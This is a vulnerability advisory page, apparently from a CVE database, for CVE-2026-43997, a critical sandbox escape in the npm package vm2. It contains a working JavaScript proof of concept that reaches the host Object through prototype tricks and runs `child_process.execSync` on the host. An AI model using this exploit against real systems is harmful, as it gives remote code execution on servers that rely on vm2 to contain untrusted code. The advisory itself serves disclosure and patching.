CVE-2026-43997

CRITICAL10.0EPSS 0.02%

vm2 Access to Host Object Enables Sandbox Escape

發布日:2026/5/7修改日:2026/5/14

描述

### Summary It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete. ### Details There are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)` ### PoC ```js const g = {}.__lookupGetter__; const a = Buffer.apply; const p = a.apply(g, [Buffer, ['__proto__']]); const o = p.call(p.call(a)); const HObject = o.constructor; sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); const obj = { [sym]: (depth, opt, inspect) => { inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")(); }, valueOf: undefined, constructor: undefined, }; WebAssembly.compileStreaming(obj).catch(() => {}); ``` ### Impact Sandbox Escape -> RCE

受影響套件(1)

npm/vm2from 0, < 3.11.0

CVSS 分數

來源	版本	嚴重程度	向量
osv	CVSS 3.1	CRITICAL10.0	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

描述

受影響套件(1)

CVSS 分數

參考連結(4)